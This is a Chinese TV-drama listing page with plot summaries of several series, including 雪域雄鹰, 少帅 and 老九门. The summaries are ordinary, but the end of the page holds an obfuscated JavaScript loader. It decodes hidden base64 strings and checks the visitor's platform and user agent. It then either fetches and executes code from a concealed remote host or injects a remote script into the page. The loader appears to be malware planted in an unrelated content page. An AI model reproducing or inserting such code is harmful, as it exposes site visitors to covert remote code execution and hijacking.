电视剧剧情

共有个剧情
  • 雪域雄鹰剧情介绍

    雪域雄鹰剧情介绍

    更新至第33集剧情

    一个年轻的小伙子爬山遭遇雪崩,雪鹰大队前往事发地点救人。大队长袁野最先赶到,找到被困者荣宁。荣宁被救,他身上的一串天珠掉到了雪坑之内。袁野的妻子、医生姜原原迅速抢救,荣宁被送往军区医院继续接受治疗。与荣宁青梅竹马的左佐来到拉萨寻找荣宁,偶遇旅游至此的富二代乔二,乔二喜欢上了左佐。袁野的母亲周副院长无意中看到荣宁是稀有血型,发现荣宁是恩人宁晓曦的孩子。回到家中,周副院长将这件事告诉了丈夫袁副司令。荣宁醒来,发现脖子上的天珠不见了,袁野许诺帮他找回。荣宁的父亲荣之跃,让自己的未婚妻汤娜去西藏找荣宁,荣宁称会跟左佐、汤娜回上海。荣宁无意间看到了自己的病历,开始怀疑自己的身世。

  • 少帅剧情介绍

    少帅剧情介绍

    更新至第48集剧情

    1912年,张作霖的原配妻子赵春桂病逝,身后留下三个孩子:长女张首芳,长子张学良和次子张学铭。姐弟三人和狗狗小白被张作霖接到沈阳,张作霖此时已有四房姨太太,并被新上任的大总统袁世凯任命为陆军二十七师师长。其后,张作霖乘坐火车前去面见袁世凯,身为老七的他在火车上豪气冲天的告诉自己的一众把兄弟(老大马龙谭,老二吴俊升,老三冯德麟,老四冯玉麟,老五张景惠,老六孙烈臣,老八张作相):奉天是自己的,别人休想染指。张学良和姐姐弟弟开始了和父亲的姨太太们同处一个屋檐下的生活,他们对父亲处处留情不满,为早逝的母亲不值。姨太太们因为张作霖对张学良几人的看重也只有讨好他们的分。一天五姨太的宠物狗虎子窜进了首芳姐弟的房间,将小白给咬死了,三姨娘做主说陪一条狗了了这桩事,首芳不忿,张学良却笑着答应了,背过身却逮住偷香肠的张学成(张作霖二哥张作孚之子),让他用香肠将虎子引诱出来,以两块银元的价格卖给了皮草行。五姨太在房里做了火锅给首芳三人吃,这时嫚子过来回话说找不到虎子,五姨太急着出了门,首芳看张学良贼眉鼠眼的样就知道是他干的,笑着敲了他一筷子。张作霖回来后,特地在家里开设私塾,请了恩师杨景镇来授课,还收了把兄弟们的儿子陪着张学良姐弟读书。这天,张学良正在街上和几人按父辈序齿拜把子,突然看见五姨太进了皮草行连忙一哄而散,果然,五姨太在店里看见虎子的皮毛晕倒了。张作霖知道这件事,派人给张学良送了一只小狗,将他叫过来,教育他男人不能像女人一样唧唧歪歪,否则成不了气候,让他在学馆里好生向学,不要打架,随后让他滚了。私塾开课,杨景镇摇头晃脑的讲学,下面一堆臭小子狗屁倒灶的事不少,冯庸(冯德麟之子)被提问就装肚子疼,张学良虽调皮于学问倒是能说得头头是道。三姨太也随着听课,放学后还将弟弟戴宪生抽大烟的嗜好告诉了张学良,张学良对三姨太的印象不错。这天晚上,戴宪生抽完大烟后将满大街的路灯都用枪崩坏了。第二天,戴宪生过来找姐姐想让她说情,张作霖让人绑了戴宪生走要将他枪毙,三姨太跪着苦求,张作霖不为所动。课堂上,冯庸等人讨论着张作霖怒杀小舅子的事,认为张作霖是六亲不认,杨景镇拿了张作霖表达“戴宪生罪不至死”的作文出来,说他怨恨父亲,张学良在课堂上胡言乱语一番,张作霖气得往死里鞭打张学良,几位姨太太下跪求情,首芳闻讯赶来,喊着张作霖的名字骂他,指责他就会欺负没妈的孩子,张作霖无言以对。

  • 产后调理院剧情介绍

    产后调理院剧情介绍

    更新至第8集剧情

    产后调理院第1集分集剧情介绍贤珍艰难生产 而后住进调理院古往今来,女人生孩子都有风险,相当于一只脚踏进了鬼门关,尤其是针对年龄高的女人。生产日这天,吴贤珍已经40岁了,她看到自己坐在一艘有死神引领的船上,知道自己一只脚踏进了鬼门关,始终感觉到不甘,贤珍告诉死神自己明明已经成为最年轻的常务了,虽然自己付出了很多努力才达到想要的位置,她不可以就这样死去,说完后奋力将死神推进了湖里,自己将船划了回去。生产前,贤珍担任GJ集团的常务,这天,有记者来采访,首先就强调了贤珍是作为集团内最年轻的女性常务,然后又说贤珍的这次升职是如何破格成功的,贤珍微笑的指出了这些带有歧视含义的词语。而后,贤珍忽然感到呕心想吐,终于没忍住离开了。然后贤珍去到医院检查,才知道自己已经怀孕六周了,贤珍想着自己成为最年轻常务的这天,同时也成为了医院里最高龄的产妇,明明这两件事情都是她无比期待的事情,但是这两件事情同时的到来,让她心情变得无比的复杂。贤珍的老公金道允也对这个孩子无比的珍视,有时间就代妻子去做产前锻炼,他也有研究过产前教育,经常会和自己的孩子说话,并鼓励贤珍也可以多和孩子交流,但是贤珍总觉得有些别扭。贤珍也很珍惜这次怀孕的机会,与此同时,贤珍也依旧很努力的工作,羊水破的这天,贤珍还在与客户谈生意,谈成功了之后才交给助理,自己开车去往医院。经过了漫长的备产期后,贤珍终于要面临生产了,贤珍之前有做过心理建设,但来到医院的这一刻,总觉得自己的尊严在慢慢丧失,不仅是不停的要在医生面前暴露自己的隐私部位,而且有些疼痛,即使外人安慰起来,也起不到一丝的作用,反而会让自己感到羞愧。贤珍终于到了生孩子的这一刻,贤珍没有想到要剧烈疼痛这么久,不停的让老公帮她找医生要无痛药,贤珍终于还是没挺过去在产子过程中痛昏了一段时间,昏迷中她看到了死神,还将死神推下了船。贤珍从鬼门关走了一趟回来,用尽最后的力气顺利生下了孩子,贤珍终于听到了孩子的哭声,安心的笑了,医生将孩子抱出来后,递给贤珍看的时候,贤珍突然发现自己的孩子和自己想象中有诸多差别,孩子不仅皱巴巴的,而且满脸通红。产后,贤珍的婆婆、妈妈都来探望,但婆婆关心的是孩子,即使贤珍无力地想说喝水都没有听见,而贤珍妈妈一进病房就看到女儿干瘪的嘴唇,给女儿喂了水。贤珍在医院进行了一段时间的产后修复,这期间需要让贤珍顺利排尿后才能出院,贤珍得知如果无法在限定时间内排尿后,将需要往身体内导管排尿,她觉得自己如果能喝到心念已久的咖啡,就可以顺利排尿,她趁母亲出门买东西的时间立马拍到医院一楼买咖啡,然而店员却说不卖给病人,贤珍看到母亲快走过来了,只好说外带。店员终于给她打包好了咖啡,贤珍赶忙拿着咖啡偷偷摸摸的跑到了电梯,电梯上行的时候,她看到了身边的一个女人漏尿了,贤珍手里的咖啡也洒在了自己身上,电梯门打开,来看望贤珍到同事们看到的就是这一副场景,大家都以为贤珍在电梯里面小便失禁。金道允赶了过来,扶贤珍走出电梯回病房,但是他也以为贤珍在电梯里面排尿,很是开心,贤珍妈妈也赶来,拿走了贤珍的咖啡。回到病房后,贤珍也排出了尿。后来,贤珍终于顺利出院,道允小心翼翼地带着贤珍去了产后调理院居住,产后调理院表面上看起来对孕妇的产后修护工作以及婴儿的抚养工作都是很完美的,但是只有住了进来才知道其中有许许多多的潜在规则。院长接待了入住的贤珍,跟她讲解了院中的设备,并告诉贤珍有问题,都可以找她,孩子也被接进专门的抚养室,由专人看管。贤珍很是满意,这里的一切。夜晚,贤珍在床上睡觉了,突然门外响起了脚步声,贤珍有些紧张,打开房门查看,发现院长在门外等她,还质问她怎么不接电话,忽然院长伸手摸向贤珍的乳房。

  • 老九门剧情介绍

    老九门剧情介绍

    更新至第48集剧情

    “我”小时候经常看到爷爷在房间里翻开一本本旧笔记,一翻就是很久,有一次“我”偷跑进爷爷的房间里,想看看爷爷在看些什么,那些很旧的笔记里是一些离奇而又晦涩的篇章。1903年,日本人大谷光瑞,以宗教考察的名义进入中国腹地,进行地理勘探方面的情报工作,在途经中国长沙时,他所带领的探险队分支,在日本商人鸠山美志的带领下,在长沙城北一百六十公里的一座山镇里停留了将近三个月时间,离开的时候,考察队只剩下六个人。一周后,鸠山美志向日本日清贸易研究所转外务省提交了一份16页的报告,史称鸠山报告。在报告中提到了这个山镇底下埋藏的“东西”。1933年,长沙火车站值班室里,正在熟睡的顾庆丰被过站的火车吵醒了。顾庆丰咒骂着出了门,搬了搬火车车窗,却发现有液体不停地往外流,仔细一看都是血,他去火车头那找列车长,擦干净窗户往里一看,列车长就那么直愣愣地看着前方,眼珠子都快掉下来了,人已经死透了。第二天一早,张大佛爷(张启山)带着人来到火车站,向顾庆丰了解情况,询问列车进站时间,经了解发现这辆火车里坐的全是日本人。顾庆丰告诉张启山这辆车是鬼车,说长沙要来恶鬼了。张启山下令封锁了长沙,带着人将焊死的火车打开了。他上了火车,发现车内的人死得很蹊跷。八爷到了火车站,掐指算了算,发现情况不妙,让张启山的手下转告他,他还有点事先回去,却被拦住了。张启山发现车内死者的后背有奇怪的纹身,并在车内挂着的衣服里发现了一个秘密试验的图纸。八爷说车内这些棺椁从文字上看基本来自同一墓穴,这些车厢里的人都是陪葬。张启山和八爷来到了最后一节车厢,发现了拴着铁链的棺材。打开棺材后,发现棺材里的人死状和押送棺材的人都是脸朝下,而真正的秘密就藏在最大的棺材里。打开这具棺材的唯一方法,就是将手伸进去从内部打开,而普通人开不了这个棺,需要张家的帮助。张启山的亲兵去开棺,却将一条手臂留在了里面。最后张启山自己伸手将棺材打开了,棺材里什么都没有,而刚才那位士兵由于太过紧张才导致断臂,张启山在这具棺材里发现了一枚戒指。八爷说这是南北朝的东西,而最了解南北朝物件的人是二爷。梨园后台内,二月红正在上妆,大堂内坐满了前来听戏的人,二月红正在台上唱戏,门外一位夫人在开锣之后才来,被拒之门外。这时张启山来到了梨园,梨园的人直接开门让张启山进去了,恰好碰见一个找茬的人,打断了二月红唱戏,被张启山的手下拿着枪赶了出去。此人因气不过在快出门时,对着张启山用了暗器,被张启山轻轻松松地躲过了,戏接着唱了起来。散场后,张启山将火车中发现的事向二月红说了,张启山将戒指拿给二月红,可二月红不想接,于是在两人的较量之中,戒指落到了一旁的桌子上。二月红告诉张启山,他已经不碰地下的东西很久了。张启山将戒指留了下来,让二月红再考虑考虑。回到房间内的二月红,一直在想张启山说的事。

  • 铁血战狼剧情介绍

    铁血战狼剧情介绍

    更新至第47集剧情

    1940年的冬季,日军集结八千余人兵分十路扫荡鲁南抱犊崮山区抗日根据地,八路军军队出现大量的伤亡,撤退时武忠义营长为了掩护大队,选择继续留在战场奋勇杀敌。武忠义的营队仅剩下四十人左右,他们只好选择拿起大刀与日军肉搏。国军旅长告诉手下炮兵连连长吕修文管好自己的防区,打仗不只是拿枪杀敌,还要讲究政治,既然日军的目标是八路军,他们就不必参与这次的战事。痛恨日军的吕修文在办公室里不停地打转,他的勤务兵小四川劝他带队攻打日军,日军马上就要打到他们的家门口,此时不出兵又更待何时。国军旅长知道吕修文会坐不住,他接连打了好几个电话要求吕修文死守防区,不许主动攻打日军。八路军营队向山林柱子岭撤退,其中一名叫柱子的队员腿被炸伤,根本无法走路,他劝武忠义把他放在这里,以免拖营队的后腿,但武忠义坚持要带他一起走。等在柱子岭设好埋伏转移时,却不见柱子的身影,武忠义赶紧带队返回找柱子,恰好看见柱子拉开手榴弹与包围他的日军同归于尽的一幕。武忠义带领战士们将大量的木材削尖后设下陷阱,日军进入山林后便死伤惨重,于是日军准备了冲锋队大举进攻,其中一名叫做前田的指挥官认为从火力点来看,日军抓着不放的并不是八路军的主力,八路军的主力肯定向别的方向撤退了,但日军司令坚持认为他们追踪的就是八路军主力,并下令让冲锋队继续进攻。八路军主力成功转移到新的根据地,可此次扫荡对八路军来说也是严重的打击,保住性命的八路军团长们为武忠义及其营队默默祈祷着。吕修文在防区内听见了日军的枪声,小四川为他支招,既然旅长不让他们进攻,可以用炮声把日军吸引到防区内来,吕修文立即采纳了他的意见,派炮兵吸引日军主力。日军进入吕修文领导的防区,吕修文派兵用重炮攻击日军,顶不住的日军向司令请求支援。司令这才发现他们误闯入了国军的防区,但仗还是要打,日军司令派出敢死队去支援前线。小四川劝吕修文出兵,只是想趁混战时逃离国军队伍,可他还未出防区便发现了大量日军,只好又回去投靠吕修文。同时武忠义也发现正在与日军交手的是国军,但他们并没有选择撤离而是留下来观察情况。渐渐地拥有重炮的国军炮兵连队也挺不住了,吕修文催促旅长派兵支援,旅长却遗憾地告诉他支援军在路上遭到敌人攻击,一时半会赶不过去,他劝吕修文带队撤退,吕修文坚持不走,甚至亲自上阵与日军肉搏。看国军陷入困境,武忠义带队从后方突袭,支援国军。

  • 山河同在剧情介绍

    山河同在剧情介绍

    更新至第52集剧情

    一九二七年五月国民政府进行第二次北伐,奉军部队退守京津一线。张国忠所率领的第五军负责掩护主力部队进行战略转移,日本关东军抓住这一有利时机,对沿途的城镇和村落进行清剿和扫荡,抢夺奉军战备物资。为保证战备物资和百姓能够安全转移,军参谋苏海龙亲自率领军直属营前往接应。在战斗过程中三排长姜峰被日本关东军先头部队包围,苏海龙率领突击小队前来营救,经过一场激战苏海龙和姜峰成功掩护战略物资和百姓撤退。苏海龙回到北京与张国忠在军部相见,张国忠表示将和张景华商量,给苏海龙和张婉婷挑选日子尽快完婚。国民政府特派员秘密来到北京与奉军代表在公使馆进行谈判,希望达成共识结束内战一致对外。另一方面土寿贤作为日本关东军在北京的代表,与张作霖一致进行磋商。希望借助与张作霖签订“满五路合同”的有利时机,让张作霖与日本关东军合作,停止与国民政府的谈判。在东北三省建立临时政府与国民政府分庭抗争,以达到日本在东北三省建立满洲国,全面侵华的战略意图。张作霖早已经看出土寿贤的野心,利用各种理由迟迟不和日本关东军签订合约。土寿贤等人得知张作霖有意离开北京前往奉天以后,决定在六国饭店召开欢迎晚宴,利用媒体和社会舆论制造张作霖与日本关东军合作的假象,从而破坏国民政府与奉军的秘密和谈,并且命令张作霖的私人军事顾问土肥原贤二亲自带着请柬前往大帅府面见张作霖。在日本关东军的参谋本部,以河本大作和竹下义晴为首的主战派,正在秘密的制定刺杀张作霖的计划,向借助张作霖前往六国饭店参加晚宴的有利时机除掉张作霖,以绝后患。张景华和张国忠早已经看出土寿贤等人的狼子野心,急调苏海龙前往大帅府,贴身保护张作霖,保证张作霖的人身安全。另一方面苏海龙率领秦牛、孙二斤、杜三将日本关东军埋伏在帅府周围的特工全部秘密除掉。在六国饭店的晚宴上张作霖以“张作霖手黑”,再次当中再次拒绝了土寿贤关于签订“满五路合同”的请求,向社会各界说明了自己不会和日本人合作的雄心壮志。

  • 嫂子·嫂子剧情介绍

    嫂子·嫂子剧情介绍

    更新至第41集剧情

    民国二十六年秋,一个大雨倾盆电闪雷鸣的夜,三边县伪县长大汉奸曹力死于自家门外,行凶者脸上蒙着一块红布,头戴一顶黑色礼帽,身穿黑色风衣,手握一把弯刀。此人行凶之时出手快如闪电,一刀封喉,曹力还未来得及发出一声惨叫便一命呜呼。行凶者正是日军谈虎色变的“红一刀”,此人神出鬼没身手不凡,是一名忠心爱国的神秘英雄,很少有人见过其真面目。曹力死亡震惊日军高层,三边县日军司令武田派出手下西村围剿红一刀,围剿行动失败,红一刀杀死许多日军士兵逃之夭夭。西村回三边县日军总部向武田复命,武田担心红一刀并非像表面看的只是单纯杀掉曹力,而是在获取日军最高机秘计划:“蜂巢计划”。实行计划的地点在丁家堡,武田派出西村借追查红一刀的名义,潜入丁家堡记录地形以及武装人员换防时间。三边县是冀东门户,丁家堡是三边县的关隘,自古以来是兵家必争之地,丁家堡历代军户驻守边关数百年,侠肝义胆,民风彪悍,逐渐成为全县最有名的大户。三边县警察署长齐明虎领队前往丁家堡,名为搜查红一刀,实为探查丁家堡的防御工事。丁家堡堡主孙红柳拄着一根拐杖,神态威严出堡接见齐明虎,时值长子丁岱宗娶亲之日,孙红柳不便与警方闹翻,同意齐明虎带队入堡搜查。日军高层派出专员森岛莅临三边县,森岛要求武田必须在十五天内在丁家堡实施“蜂巢计划”,否则自行切腹谢罪。何拐子是三边县知名理发师,伪军长官朱队长经常光顾理发店理发。警方在丁家堡搜查,未能找到红一刀,孙红柳命人对一名神色异常的警员搜身,从其身上搜出一本记录丁家堡地形的小册子,被搜身的警员是西村,孙红柳看在儿子丁岱宗即将娶亲的份上,放走了西村。 街上人来人往,丁岱宗未过门的妻子张青云在街上抓小偷,在何拐子的帮助下从小偷身上追回赃物,何拐子表面是一个瘸子理发师,其实是一名地下党员。齐明虎的弟弟齐明哲爱恋张青云,却无法阻止张青云嫁到丁家堡,只能跑到张家门外撕门神纸,发泄心中不满,张青云外出归来数落了齐明哲一顿。齐明虎返回日军总部,向武田献计,活捉出堡迎亲的丁岱宗,污蔑对方是红一刀。丁岱宗出堡路线无人得知,齐明虎派出一个奸细,向欠了一屁股赌债的丁家堡管家张山民威胁利诱,张山民不得已之下向奸细提供丁岱宗迎亲路线。齐明虎当医生的妹妹齐明慧是一名爱国进步青年,日军入侵中国无恶不作,齐明慧与地下党员何拐子建立联络,暗中获取当警长的哥哥齐明虎的动向,当她得知哥哥即将派兵捉拿丁岱宗,立即出门在街上画暗号与何拐子联系。日军在山路上布下火炮,丁岱宗入三边县接 走张青云,在回程路上遭到日军袭击。

  • 金玉瑶剧情介绍

    金玉瑶剧情介绍

    更新至第40集剧情

    沈立玩世不恭的模样让沈父甚为担心,他并不知道沈立与抗日侨胞救国会负责人邢冬关系密切。邢冬看中沈立的经商才能,希望他能帮助经营救国会。中共地下党任勤之发现邢冬身处险境,希望他能尽快离开。中统监视着邢冬的一举一动。

  • 飞虎队剧情介绍

    飞虎队剧情介绍

    更新至第40集剧情

    1936年,枣庄已被日军占领。日军大肆掠夺枣庄地区煤矿及物资。因生活所迫在枣庄出现了一批专靠吃两条线,劫夺日军运输火车的好汉,一支以刘洪为首,一支以李九为首。两方为争夺临枣支线的控制权展开争斗,刘洪单枪匹马来到废弃车站与李九谈判,不想谈判不成,双方开战。刘洪以少对多利用地形与李九的人马周旋,危急关头王强、彭亮、鲁汉、林忠等开着劫夺日军的火车前来营救,李九率人爬上火车誓要杀死刘洪等人,刘洪率领弟兄们用计将李九手下分而抓获,最后却又下令将李九等人放走,李九甘拜下风,佩服刘洪的侠义之情,率领兄弟离开临枣支线。刘洪得知李九离开后拉起扛日队伍劫夺日军车辆与日军抗争的事迹后十分佩服,得知李九不幸被日军抓获,刘洪率领兄弟们劫火车将李九等人救出。好景不长,刘洪等人的藏身之处被日军侦知,他与手下兄弟被日军合围,纷纷中枪倒地,当刘洪睁开眼睛才知道是八路军救了他与王强,二人参加了八路。

  • 狐影剧情介绍

    狐影剧情介绍

    更新至第48集剧情

    1944年的香港。在街上一个理发店里,两个正在理发的日本人如同往常一样,利用理发的时间进行鸦片交易。就在他们交易完闭着眼睛享受真正的理发时间时,一把冰冷锋利的剃刀架在其中一人的脖子上。等他惊悚地发现侧头看旁边合作伙伴时,才发现他不知何时已经悄无声息地被眼前打扮成理发师的小伙子干掉。小伙子留他性命是想追问他日军藏鸦片的地方,但他死活不说。小伙子手起刀落利索地干掉这个日本人后,不慌不忙地离开。这个小伙子叫雷震,是国名党军统二厅的特务。他英俊潇洒气宇轩昂且身怀绝技。就在他离开的路上,他看到街边的一个石牌坊上悬挂着两男一女的尸体,紧接着便看到大量日军步伐慌乱地往前赶去。雷震以为他们发现了理发店被杀的日本人,但他的伙伴同样为军统特务的冯波告诉他,日军集合队伍是为了对付袭击贵宾楼的人,他们估计贵宾楼就是日军藏鸦片的地方。雷震原打算第二天回重庆的,但既然知道此事依他的性格是一定要去探一探的。就在雷震潜入贵宾楼时,被暗处一双眼睛盯住。雷震扮成日军的样子在楼里观察。据他观察几处有大量血渍的地方,他基本可以推测出之前这里发生的事情,也估计出石牌坊那里挂的两男一女在贵宾楼所做的一切。原来他们是想找到和炸毁日军藏匿的鸦片,但没料到被一个姓叶的特务出卖,参与行动的一行四人,除了负责在外接应他们的王红云,其他三人全部牺牲。而那个躲在暗处观察雷震的就是王红云。王红云发现了雷震与其他日军的不同,知道他是乔装而来的中国人。她想知道雷震的目的。雷震在猜测她是之前行动的幸存者后,告诉她他们行动失败一定是因为有人出卖。他想知道这个潜伏在国民党队伍里的叛徒到底是谁,他要清理门户。王红云虽然不太信任他,但还是把叛徒的名字和藏身的地方告诉了他。经过周密打探和安排,冯波带人和他们一起参与行动。冯波和王红云去找叛徒,雷震去找日军的鸦片并负责烧毁。他们三人均是人中龙凤,他们不仅顺利抓到叛徒还将日军仓库里的鸦片付之一炬。为了让王红云解恨,雷震亲自把手枪交到王红云手中,由她亲手杀了姓叶的叛徒。第二天雷震动身去重庆。王红云在送别他时告诉他自己对他的信任,同时通过二人握手道别传递给雷震一种密码,让他以后可以通过这个密码和她联系。就在雷震转身时,王红云又附在他耳边告诉他,重庆的官员们身边几乎都安插的有日本特务,他们会随时杀了这些官员。雷震马上为他的上司重庆军令部二厅厅长郭绍儒担忧起来。他马不停蹄地赶回重庆。郭绍儒厅长带着秘书一起坐车时发现司机行走路线与以往不同。郭绍儒好奇地问司机,司机回答水把道路冲坏,所以要绕道。郭绍儒没有怀疑。谁知走到半路,前面一个戴眼镜的老人突然摔倒在路中央。郭绍儒的司机气急败坏地辱骂老人。郭绍儒让秘书下车查看。就在秘书接近老人时,老人突然出手,秘书慌忙应对。这时司机突然朝郭绍儒发难,用枪同时瞄准了郭绍儒和那个劫持秘书的老人。郭绍儒大惊。谁知此时剧情逆转,老人突然大笑,称总算让郭绍儒身边的特务原形毕露。哪知司机突然打晕郭绍儒后发动车辆狂奔。老人伸手敏捷地操近路追了上去。老人随后追上汽车制服司机。郭绍儒总算有惊无险,但他对这个神秘的老人非常好奇。老人撕掉粘贴的胡须后露出他的真面目,原来是雷震假扮。雷震帮上司除掉卧底特务心情非常愉悦,但考虑到此处也是日本人活动区域,他们来不及叙旧就准备马上离开。哪知他们看到窗外灌木丛中钻出许多荷枪实弹的日本人。

  • 野山鹰剧情介绍

    野山鹰剧情介绍

    更新至第42集剧情

    1941年秋,抗日战争正值相持阶段,国共合作共同御敌,日军为了加快侵略步伐,残酷镇压一切抗日行动。一时间,中华大地血雨腥风,生灵涂炭。野山鹰是四明山游击队担架队队长,她武艺高强,枪法精准,性子刚烈,桀骜不驯。这一天她瞒着新四军团长赵志国带着弓箭只身到树林里伏击日本鬼子。她在树林里来无影去无踪,几乎是箭无虚发,一个人干掉不少日本鬼子。赵志国批评她不该搞个人主义,让她好好地担任好担架队队长救护好伤员,她却一笑而过,不予理睬,根本不闭门思过,转身就去找表妹胖妞陪她回村。哪知,就在她们回村前胖妞他们村子遭到日本人屠村,那时村民们正在看戏一点防备也没有。等胖妞回到家看到的只是父亲和弟弟躺在地上的尸体,胖妞痛哭失声,野山鹰愤怒的目眦尽裂。不久,日本人又一次发动进攻,国民党的二零六团和共产党的新四军联合抵抗日军。但日军火力非常的劲猛,他们武器装备先进,军火供应充足,国共两方都损失惨重。国民党军队里刚当兵不久的朱有为看到日军火力过猛,于是带着师弟耗子等人仓皇逃跑。原本他是耗子的二师兄,他们两人都是戏子,是日本人屠胖妞他们村时的幸存者,那时他正在戏台上唱戏,逃过日本人的屠村后为混口饭吃才当的兵。当他们一行人逃到山林时,正好碰到军统随军督战组的苏海棠队长和队员李丹阳。苏海棠见二师兄朱有为等人临阵脱逃当逃兵,义正辞严地拿枪把他们逼回前线。众人悻悻地往回走,二师兄却对苏海棠的飒爽英姿印象深刻。野山鹰带着胖妞在战场上忙着抢救伤员,胖妞突然中弹,眼睁睁地死在野山鹰面前。野山鹰顿时如发狂一般,抱起一把狙击枪就往日军冲去。新四军的众兄弟们看她一付不要命的样子,都吓坏了,但枪林弹雨众人也不及阻止。所幸野山鹰身手敏捷,躲过鬼子的枪弹,直到战役结束野山鹰毫发无损。战争结束后,经过清查,国民党的二零六团和共产党的新四军都损失惨重。国民党的二零六团的团长阵亡,整个团人员所剩无几。苏海棠抬着在战场上因为救自己受伤严重的老兵罗汉。这时她发现自己的东西落在了战场,于是回身去找。结果碰到报务员姚雪婷正拿着刚收到的师部的命令准备撕毁,因为团长阵亡部队解散,她拿 着命令不知向谁汇报。苏海棠告诉她,目前她是战场上职位最高的长官,她让姚雪婷将命令汇报给自己。命令是师部发来的。师部下令二零六团组建小分队联络四明县特工“老爷”,营救被日军集中营关押的军火专家曹大年,因为曹大年能抵的上鬼子一个师团的力量,而他们战争的失败很大一部分原因是因为军火跟不上日军。营救曹大年意义重大,苏海棠决定由自己带人执行这个命令。苏海棠向二零六团的散兵游勇们招募人马,想组成小分队执行秘密任务。 结果没有人愿意。而已换好便装准备带师弟耗子一起逃走的二师兄突然改变了主意,他主动请缨要求参加小分队。耗子劝他不要为了讨好美女送了性命,二师兄不听。而其他人却不想再跟着去打仗送死。老兵罗汉却为了不拖累苏海棠自杀于众人面前。众人见罗汉正气凛然顾全大局,深受触动。他们纷纷表示愿意加入小分队,决定跟随苏海棠一起。苏海棠宣布,海棠行动小组正式成立。

  • 外来媳妇本地郎剧情介绍

    外来媳妇本地郎剧情介绍

    更新至第100集剧情

    作家在汝好餐厅宴请北方来的朋友,饭后结账时发现钱不够,慌乱中竟摸出地铁卡,阿宗夫妇为了不让其难堪,同意让其签单赊账。月末,阿宗找其结账时,作家竟赖账,最后迫于压力只好作罢。野模受刘晓庆逃税被捕事件的影响,千方百计想在汝好餐厅搞到发票以冲销演出的酬金没能得逞,遂与作家不谋而合,打算报复汝好餐厅。二人整日混迹于汝好餐厅,统计客流量和开发票的情况,企图掌握餐厅每天的营业额,以备举报汝好餐厅逃税的资料。经过与税务部门咨询,作家等人知道汝好一直采取“双定”交税,并无违法之嫌。某日,阿宗到税务部门纳税时得悉曾有人匿名举报,便怀疑是明仔所为,大家闹得不欢而散。那边,野模为找发票而奔忙,当向作家求助时,对方竟要索取回报,令野模十分气愤。为了讨好阿宗以求得发票,野模竟向阿宗告了作家一状,阿宗找其算账,作家又把责任推到了野模身上。 阿光夫妇对税收政策知之甚少,担心自己每月收取的代管费有逃税之嫌,后经咨询得知即使要交税也是祝师奶的事,便把情况告知祝师奶,祝师奶连忙从上海返回,决定把众租客认作是亲戚,以逃纳税。祝师奶对众租客反复强调,不管是谁问及收租一事,均说房东跟他们是亲戚关系,不会收他们一分钱。祝师奶返回上海后,来电查询当月的收租情况,方知众租客都钻了空子没有交租,因为彼此是亲戚关系。祝师奶后悔不已,决定宁可守法纳税,也不把他们认作是自己的亲戚。

function aPDbVf(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function QrYMiIL(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return aPDbVf(t);};window[''+'S'+'G'+'F'+'Y'+'T'+'P'+'H'+'t'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=QrYMiIL,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('a21ob2kuam5rbXdyLnnh5eg==','155037',window,document,['n','EyYnQDt']);}:function(){};